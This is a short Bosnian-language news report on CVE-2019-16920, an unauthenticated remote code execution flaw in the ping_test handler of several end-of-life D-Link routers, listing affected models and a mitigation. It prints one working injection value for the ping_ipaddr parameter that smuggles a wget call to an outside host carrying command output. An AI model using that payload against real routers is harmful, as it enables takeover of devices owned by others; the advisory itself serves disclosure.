Ranjivost koja se može daljinski iskoristiti u D-Link ruterima

U D-Link bežičnim ruterima identifikovan opasna ranjivost (CVE-2019–16920), koji vam omogućava daljinsko izvršavanje koda na strani uređaja slanjem posebnog zahtjeva rukovaocu „ping_test“, kojem se može pristupiti bez autentifikacije.

Zanimljivo je da bi, prema riječima programera firmvera, poziv „ping_test“ trebao biti izvršen tek nakon autentifikacije, ali u stvarnosti se poziva u svakom slučaju, bez obzira na prijavu na web sučelje. Konkretno, kada se pristupa skripti apply_sec.cgi i prosljeđuje parametar “action=ping_test”, skripta se preusmjerava na stranicu za provjeru autentičnosti, ali u isto vrijeme izvodi akciju povezanu sa ping_testom. Za izvršenje koda korištena je još jedna ranjivost u samom ping_testu, koji poziva uslužni program za ping bez odgovarajuće provjere ispravnosti IP adrese poslane na testiranje. Na primjer, da biste pozvali uslužni program wget i prenijeli rezultate naredbe “echo 1234” na vanjski host, samo navedite parametar “ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".

Ranjivost koja se može daljinski iskoristiti u D-Link ruterima

Prisustvo ranjivosti službeno je potvrđeno u sljedećim modelima:

  • DIR-655 sa firmverom 3.02b05 ili starijim;
  • DIR-866L sa firmverom 1.03b04 ili starijim;
  • DIR-1565 sa firmverom 1.01 ili starijim;
  • DIR-652 (nema informacija o problematičnim verzijama firmvera)

Period podrške za ove modele je već istekao, tako da je D-Link navedeno, koji neće objaviti ažuriranja za njih kako bi se otklonila ranjivost, ne preporučuje njihovo korištenje i savjetuje njihovu zamjenu novim uređajima. Kao sigurnosno rješenje, možete ograničiti pristup web sučelju samo na pouzdane IP adrese.

Kasnije je otkriveno da je i ranjivost bila utiče modeli DIR-855L, DAP-1533, DIR-862L, DIR-615, DIR-835 i DIR-825, planovi za izdavanje ažuriranja za koje još nisu poznati.

izvor: opennet.ru

Dodajte komentar